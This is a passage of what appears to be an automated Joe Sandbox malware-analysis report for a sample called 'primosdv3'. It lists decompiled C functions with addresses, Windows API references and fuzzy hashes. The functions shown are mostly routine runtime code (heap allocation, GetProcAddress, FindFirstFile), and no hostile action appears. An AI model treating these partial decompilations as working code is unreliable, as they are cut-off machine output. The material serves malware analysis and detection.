				void* _t44;
				intOrPtr _t46;

				_t38 = __edx;
				E00C7EB78(0xc92b3c, _t44);
				_push(__ecx);
				E00C7EC50(0x2108);
				_push(_t25);
				 *((intOrPtr*)(_t44 - 0x10)) = _t46;
				E00C86066(0xcb5872, "X");
				E00C70659(0xcb7894, _t38, 0xc935f0);
				E00C86066(0xcb6892,  *((intOrPtr*)(_t44 + 0xc)));
				E00C65B3D(0xcac578, _t38,  *((intOrPtr*)(_t44 + 0xc)));
				_t4 = _t44 - 4;
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t19 = 2;
				 *0xcb4850 = _t19;
				 *0xcb484c = _t19;
				 *0xcb4848 = _t19;
				_t20 =  *0xca8461; // 0x0
				 *0xcb36d3 = _t20;
				_t21 =  *0xca8462; // 0x0
				 *0xcb370c = 1;
				 *0xcb370f = 1;
				 *0xcb36d4 = _t21;
				E00C67B0D(_t44 - 0x2118, _t38,  *_t4, 0xcac578);
				 *(_t44 - 4) = 1;
				E00C67C7D(_t44 - 0x2118, _t38,  *_t4);
				_t24 = E00C67B9E(_t25, _t44 - 0x2118); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t24;
			}

0x00c7da52
0x00c7da57
0x00c7da5c
0x00c7da62
0x00c7da67
0x00c7da6a
0x00c7da77
0x00c7da88
0x00c7da95
0x00c7daa6
0x00c7daab
0x00c7daab
0x00c7dab7
0x00c7dab8
0x00c7dabd
0x00c7dac2
0x00c7dac7
0x00c7dacc
0x00c7dad1
0x00c7dad7
0x00c7dade
0x00c7dae5
0x00c7daea
0x00c7daf5
0x00c7daf9
0x00c7db04
0x00c7db0e
0x00c7db17

APIs

__EH_prolog.LIBCMT ref: 00C7DA57

Part of subcall function 00C70659: _wcslen.LIBCMT ref: 00C7066F

Part of subcall function 00C67B0D: __EH_prolog.LIBCMT ref: 00C67B12

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 96273fe69e09e7d42a479ba02a71a47a671ed15bcc833ecec88cbf49c1e60d3d
Instruction ID: d3ea48c7276fd7de168116036d2cbc444b423dcd37428e144c27c093bc8e5078
Opcode Fuzzy Hash: 96273fe69e09e7d42a479ba02a71a47a671ed15bcc833ecec88cbf49c1e60d3d
Instruction Fuzzy Hash: 75113A71908280AFD715EB68EC07BCC7FA4DB15314F10819AF105972C2DB750A40DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00C69215 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00C69215(void* __ebx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				void* _t48;

				E00C7EB78(0xc92895, _t41);
				E00C613BA(_t41 - 0x20, E00C67C64());
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t39 = E00C6D114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
				if(_t39 > 0) {
					_t27 =  *((intOrPtr*)(_t41 + 0x10));
					_t36 =  *((intOrPtr*)(_t41 + 0xc));
					do {
						_t48 = 0 - _t27;
						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
							_t39 = _t36;
						}
						if(_t39 > 0) {
							E00C6D300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
							asm("cdq");
							_t36 = _t36 - _t39;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t41 - 0x1c)));
						_push( *((intOrPtr*)(_t41 - 0x20)));
						_t39 = E00C6D114( *((intOrPtr*)(_t41 + 8)));
					} while (_t39 > 0);
				}
				_t21 = E00C615FB(_t41 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t21;
			}

0x00c6921a
0x00c6922c
0x00c6923a
0x00c69243
0x00c69247
0x00c6924a
0x00c6924e
0x00c69251
0x00c69253
0x00c69255
0x00c6925d
0x00c6925d
0x00c69261
0x00c6926a
0x00c69271
0x00c69272
0x00c69274
0x00c69274
0x00c69276
0x00c6927c
0x00c69284
0x00c69286
0x00c6928b
0x00c6928f
0x00c69298
0x00c692a0

APIs

__EH_prolog.LIBCMT ref: 00C6921A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 493e3013abc55b712dead9e33f109f89a0c4e074a37d98745522292b0985c6a5
Instruction ID: 5b7b797b1f517eaad44b1350d415e9ebf539acb44ddbd455484fcb75e0887d79
Opcode Fuzzy Hash: 493e3013abc55b712dead9e33f109f89a0c4e074a37d98745522292b0985c6a5
Instruction Fuzzy Hash: D7016573D00528ABCF31ABA8CDD19DEB735EF88750F054525E816BB262DA348D05D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C8B136 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00C8B136(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xcc26e4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00C88C34();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00C891A8())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00C87A5E(_t15, _t16, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00c8b136
0x00c8b13c
0x00c8b141
0x00c8b14f
0x00c8b14f
0x00c8b155
0x00c8b157
0x00c8b157
0x00c8b16e
0x00c8b177
0x00c8b17f
0x00000000
0x00000000
0x00c8b15f
0x00c8b161
0x00c8b183
0x00c8b188
0x00c8b18e
0x00000000
0x00c8b18e
0x00c8b164
0x00c8b169
0x00c8b16a
0x00c8b16c
0x00000000
0x00000000
0x00c8b16c
0x00000000
0x00c8b16e
0x00c8b147
0x00c8b148
0x00c8b14d
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C89813,00000001,00000364,?,00C840EF,?,?,00CA1098), ref: 00C8B177

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a21ffa53dc0c5c85699083f3aa5ddb7abc2f0852d84846367ece40c1543b61e2
Instruction ID: 6b94ede1575aed32128a12426ce73e0a639da1af97ab9b07429a14339038a09f
Opcode Fuzzy Hash: a21ffa53dc0c5c85699083f3aa5ddb7abc2f0852d84846367ece40c1543b61e2
Instruction Fuzzy Hash: B3F0B43254512567DB257A22AC1EBAF7748AB41768B188221F8289F190CB20DE0193E8

Uniqueness

Uniqueness Score: -1.00%

Function 00C83C0D Relevance: 1.5, APIs: 1, Instructions: 34
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C83C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0xcc20ec + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E00C83B72(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}

0x00c83c15
0x00c83c1c
0x00c83c1f
0x00c83c24
0x00c83c51
0x00000000
0x00c83c51
0x00c83c28
0x00c83c30
0x00c83c39
0x00c83c4f
0x00c83c4f
0x00000000
0x00c83c4f
0x00c83c3f
0x00c83c47
0x00000000
0x00000000
0x00c83c4b
0x00000000
0x00c83c4b
0x00c83c56

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00C83C3F

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fe14b29fe6968ef15c8ae87a91ea2f420a303bd1c4fec7c71b2131593203f5aa
Instruction ID: 5ff757dbda86c09ddf8dea6636b2d8382ab2c85af1e8c6d7969d858dbb0ca0fd
Opcode Fuzzy Hash: fe14b29fe6968ef15c8ae87a91ea2f420a303bd1c4fec7c71b2131593203f5aa
Instruction Fuzzy Hash: 1EF0EC322002969FCF116EA9EC04A9B7799FF01F247105225FA15E7190DB31DB20D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00C88E06 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00C88E06(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00C891A8())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xcc26e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00C88C34();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00C87A5E(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00c88e06
0x00c88e0c
0x00c88e12
0x00c88e44
0x00c88e49
0x00c88e4f
0x00000000
0x00c88e4f
0x00c88e16
0x00c88e18
0x00c88e18
0x00c88e2f
0x00c88e38
0x00c88e40
0x00000000
0x00000000
0x00c88e20
0x00c88e22
0x00000000
0x00000000
0x00c88e25
0x00c88e2a
0x00c88e2b
0x00c88e2d
0x00000000
0x00000000
0x00c88e2d
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00C84286,?,0000015D,?,?,?,?,00C85762,000000FF,00000000,?,?), ref: 00C88E38

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5e7f8d8e622d48a9a6a1f5d0930ccd52b5e32b66e5dc31a12f3665e1c64861c4
Instruction ID: c4e4d5dfb7473db897434f9ed92d245681e16685fe7d7016fe76494c2a633caa
Opcode Fuzzy Hash: 5e7f8d8e622d48a9a6a1f5d0930ccd52b5e32b66e5dc31a12f3665e1c64861c4
Instruction Fuzzy Hash: 18E0ED3924662556EA7136629C09BAF76889F413ACF950121BC2897C91CF20CE0493EC

Uniqueness

Uniqueness Score: -1.00%

Function 00C65ABD Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00C65ABD(intOrPtr __ecx, void* __eflags) {
				void* _t36;

				E00C7EB78(0xc92739, _t36);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E00C6B505(__ecx); // executed
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00C70637();
				 *(_t36 - 4) = 1;
				E00C70637();
				 *(_t36 - 4) = 2;
				E00C70637();
				 *(_t36 - 4) = 3;
				E00C70637();
				 *(_t36 - 4) = 4;
				E00C70637();
				 *(_t36 - 4) = 5;
				E00C65CAC(__ecx,  *(_t36 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return __ecx;
			}

0x00c65ac2
0x00c65ac7
0x00c65acb
0x00c65ace
0x00c65ad3
0x00c65add
0x00c65ae8
0x00c65aec
0x00c65af7
0x00c65afb
0x00c65b06
0x00c65b0a
0x00c65b15
0x00c65b19
0x00c65b20
0x00c65b24
0x00c65b2f
0x00c65b37

APIs

__EH_prolog.LIBCMT ref: 00C65AC2

Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 37368e369976a80ee921dc5e1d613eacbbc20193044481715cf809deb7eabe0d
Instruction ID: 1f1e44666d5cfbfef501cce5eaaddc226e3fde61b8dd41da572ebcd4d6edfb05
Opcode Fuzzy Hash: 37368e369976a80ee921dc5e1d613eacbbc20193044481715cf809deb7eabe0d
Instruction Fuzzy Hash: 83014F30911794DAD725E7B8C0657EDFBE4DF65304F64848EB85A63282CBB41B08E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C69620 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C69620(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 8) != 0xffffffff) {
					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
				}
				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
					E00C66BD5(0xca1098, _t21 + 0x32);
				}
				return _t16;
			}

0x00c69622
0x00c69624
0x00c6962a
0x00c69630
0x00c69641
0x00c69646
0x00c69648
0x00c69648
0x00c6964a
0x00c6964a
0x00c6964e
0x00c69654
0x00c69664
0x00c69664
0x00c6966d

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00C695D6,?,?,?,?,?,00C92641,000000FF), ref: 00C6963B

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4b90cb8c8f48d7fee32ad8c165e3367af0f0ac8b2e8e0385148509ec4f7faff0
Instruction ID: 56cefb82ad5f2d13370afc978380dd49d280ceee42265cdf161f98eaae09bb35
Opcode Fuzzy Hash: 4b90cb8c8f48d7fee32ad8c165e3367af0f0ac8b2e8e0385148509ec4f7faff0
Instruction Fuzzy Hash: A5F05E70481B559FDB308A64C498B92B7ECEF12335F045B1EE4F6429E0D771AA8D9A40

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A56D Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6A56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				void* _t13;
				intOrPtr _t19;

				_t19 = _a8;
				 *((char*)(_t19 + 0x1044)) = 0;
				if(E00C6BDB4(_a4) != 0) {
					L3:
					return 0;
				}
				_t13 = E00C6A69B(0xffffffff, _a4, _t19); // executed
				if(_t13 == 0xffffffff) {
					goto L3;
				}
				FindClose(_t13); // executed
				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
				 *((char*)(_t19 + 0x100c)) = E00C6A28F( *((intOrPtr*)(_t19 + 0x1008)));
				 *((char*)(_t19 + 0x100d)) = E00C6A2A6( *((intOrPtr*)(_t19 + 0x1008)));
				return 1;
			}

0x00c6a56e
0x00c6a576
0x00c6a584
0x00c6a5cb
0x00000000
0x00c6a5cb
0x00c6a58d
0x00c6a595
0x00000000
0x00000000
0x00c6a598
0x00c6a5a4
0x00c6a5b6
0x00c6a5c1
0x00000000

APIs

Part of subcall function 00C6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6C4
Part of subcall function 00C6A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6F2
Part of subcall function 00C6A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 57f7feb3256091b1c4dcbf7836d521c20919b36e0bc5ca42dd9c7366d8d1624f
Instruction ID: 3609c3f3ac8bfed4465ba982b6b376ad3d78ecd2020ee84fad6b2a200d4f33cd
Opcode Fuzzy Hash: 57f7feb3256091b1c4dcbf7836d521c20919b36e0bc5ca42dd9c7366d8d1624f
Instruction Fuzzy Hash: 73F08931008790AACB3267B489847CB7B905F15331F048A4EF1FE62196C37550949F23

Uniqueness

Uniqueness Score: -1.00%

Function 00C70E08 Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C70E08() {
				void* __esi;
				void* _t2;

				L00C71B58(); // executed
				_t2 = E00C71B5D();
				if(_t2 != 0) {
					_t2 = E00C66C31(_t2, 0xca1098, 0xff, 0xff);
				}
				if( *0xca10a4 != 0) {
					_t2 = E00C66C31(_t2, 0xca1098, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x00c70e0a
0x00c70e0f
0x00c70e20
0x00c70e25
0x00c70e25
0x00c70e31
0x00c70e36
0x00c70e36
0x00c70e3d
0x00c70e45

APIs

SetThreadExecutionState.KERNEL32 ref: 00C70E3D

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 7b496ec5ffa70fa01b5975705b78177bf4c1e0379534973282bfe962db23886f
Instruction ID: 62c8a29db4e27746d64c4d3e6d3d2b2a8409235deb946b92c96b052fd87b3131
Opcode Fuzzy Hash: 7b496ec5ffa70fa01b5975705b78177bf4c1e0379534973282bfe962db23886f
Instruction Fuzzy Hash: 7CD02B1060109467DF21372C28597FF35068FC7310F0C4026F99D67283CE444882B361

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A626 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00C7A626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00C7EB02();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00C7A3B9(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00c7a629
0x00c7a62a
0x00c7a62c
0x00c7a631
0x00c7a636
0x00000000
0x00c7a647
0x00c7a640
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00C7A62C

Part of subcall function 00C7A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7A3DA

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: c7400c4c6a065cac5feae6db88dfa657c7d63bca4f29af66059750b58ba13829
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 6FD0C971210209BADF426F628C1296E7A99EB80340F04C125B85AD5191EAB1DA10A666

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E5BB Relevance: 1.5, APIs: 1, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00C7E5BB(void* __esi) {
				void* _t2;
				intOrPtr _t5;
				void* _t6;
				void* _t11;

				_t11 = __esi;
				if(( *0xc95650 & 0x00001000) == 0) {
					return _t2;
				} else {
					E00C7E664();
					_t5 =  *0xcc1ce8 + 1;
					 *0xcc1ce8 = _t5;
					if(_t5 == 1) {
						E00C7E78D(4, 0xcc1cec); // executed
					}
					_t6 = E00C7E5EE();
					if(_t6 == 0) {
						 *0xcc1ce4 = 0;
						return _t6;
					} else {
						 *0xc93278(0xcc1ce4, _t11);
						return  *((intOrPtr*)( *0xcc1ce0))();
					}
				}
			}

0x00c7e5bb
